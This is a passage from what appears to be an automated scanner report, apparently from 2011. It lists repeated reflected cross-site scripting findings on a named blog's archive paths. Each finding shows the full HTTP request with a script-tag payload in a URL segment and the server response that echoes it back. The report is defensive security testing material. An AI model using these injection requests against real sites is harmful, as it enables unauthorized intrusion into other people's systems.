GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p>
...[SNIP]...

1.28. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p>
...[SNIP]...

1.29. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p>
...[SNIP]...

1.30. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p>
...[SNIP]...

1.31. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p>
...[SNIP]...

1.32. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p>
...[SNIP]...

1.33. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p>
...[SNIP]...

1.34. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p>
...[SNIP]...

1.35. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p>
...[SNIP]...

1.36. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p>
...[SNIP]...

1.37. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p>
...[SNIP]...

1.38. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p>
...[SNIP]...

1.39. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p>
...[SNIP]...

1.40. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p>
...[SNIP]...

1.41. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p>
...[SNIP]...

1.42. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p>
...[SNIP]...

1.43. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p>
...[SNIP]...

1.44. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
